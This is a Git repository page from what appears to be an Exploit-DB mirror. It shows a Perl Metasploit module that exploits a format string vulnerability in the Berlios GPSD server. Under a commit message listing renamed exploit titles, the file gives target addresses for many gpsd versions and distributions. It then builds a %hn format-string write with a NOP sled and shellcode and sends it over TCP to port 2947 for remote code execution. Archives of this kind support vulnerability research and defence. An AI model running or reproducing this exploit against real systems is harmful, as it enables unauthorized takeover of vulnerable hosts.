bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/remote/3099.pm
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

124 lines
3.5 KiB
Perl
Executable file
Raw Blame History

package Msf::Exploit::gpsd_format_string;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use IO::Socket;
my $advanced = { };
my $info = {
'Name' => 'Berlios GPSD Format String Vulnerability',
'Version' => '$ 1.0 $',
'Authors' => [ 'Enseirb <senotier [at] enseirb.fr>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 2947],
},
'Payload' =>
{
'Space' => 1004,
'BadChars' => "\x00\x0a\x0d\x0c",
},
'Targets' =>
[
[ "gpsd-1.91-1.i386.rpm", 0x0804f250,0x41424344 ], # .rpms Tested on Redhat 9.0
[ "gpsd-1.92-1.i386.rpm", 0x0804f630,0x41424344 ],
[ "gpsd-1.93-1.i386.rpm", 0x0804e154,0x41424344 ],
[ "gpsd-1.94-1.i386.rpm", 0x0804f260,0x41424344 ],
[ "gpsd-1.95-1.i386.rpm", 0x0804f268,0x41424344 ],
[ "gpsd-1.96-1.i386.rpm", 0x41424344,0x41424344 ],
[ "gpsd-1.97-1.i386.rpm", 0x0804b14c,0x41424344 ],
[ "gpsd-2.1-1.i386.rpm", 0x0804c7a0,0x41424344 ],
[ "gpsd-2.2-1.i386.rpm", 0x0804c7a0,0x41424344 ],
[ "gpsd-2.3-1.i386.rpm", 0x0804c730,0xbfffd661 ],
[ "gpsd-2.4-1.i386.rpm", 0x0804c7b8,0xbfffde71 ],
[ "gpsd-2.5-1.i386.rpm", 0x0804c7dc,0xbfffdc09 ],
[ "gpsd-2.6-1.i386.rpm", 0x0804c730,0xbffff100 ],
[ "gpsd-2.7-1.i386.rpm", 0x0804c5bc,0xbfffcabc ],
[ "gpsd_2.6-1_i386.deb", 0x0804c7c4,0xbfffedc8 ],
[ "gpsd_2.7-1_i386.deb", 0x0804c6c4,0xbfffc818 ],
[ "gpsd_2.7-2_i386.deb", 0x0804c770,0xbfffee70 ],
["SuSE 9.1 compiled 2.0", 0x0804c818,0xbfffe148 ],
[ "Slackware 9.0 compiled 2.0", 0x0804b164,0xbfffd7d6 ],
[ "Slackware 9.0 compiled 2.7 ", 0x0804c3ec,0xbfffe65c ],
[ "Debug ", 0x41424344,0xdeadbeef ],
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a format string vulnerability in the Berlios GPSD server.
This vulnerability was discovered by Kevin Finisterre.
}),
'Keys' => ['gpsd'],
'DisclosureDate' => 'May 25 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_idx = $self->GetVar('TARGET');
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->Print("[*] Reading information from target " . $target_host . ": ");
my $offset = 17;
my $dump_fmt = 7;
my $al = 3;
my ($hi,$lo);
my ($shift0,$shift1);
my $buf;
$hi = ($target->[2] >> 0) & 0xffff;
$lo = ($target->[2] >> 16) & 0xffff;
$shift0 = sprintf("%d",$hi) - sprintf("%d",$offset) - ($dump_fmt * 8 + 16 + $al);
$shift1 = (sprintf("%d",0x10000) + sprintf("%d",$lo)) - sprintf("%d",$hi);
$buf = "A" x 3 . "B" x 4;
$buf .= pack('V',$target->[1]);
$buf .= "B" x 4;
$buf .= pack('V',$target->[1] + 0x2);
$buf .= "%.8x" x7 ."%.".$shift0."lx%hn"."%.".$shift1."lx%hn";
$buf .= $self->MakeNops(3000) . $shellcode ;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($buf);
$s->Close();
return;
}
1;
# milw0rm.com [2007-01-08]
Reference in a new issue View git blame Copy permalink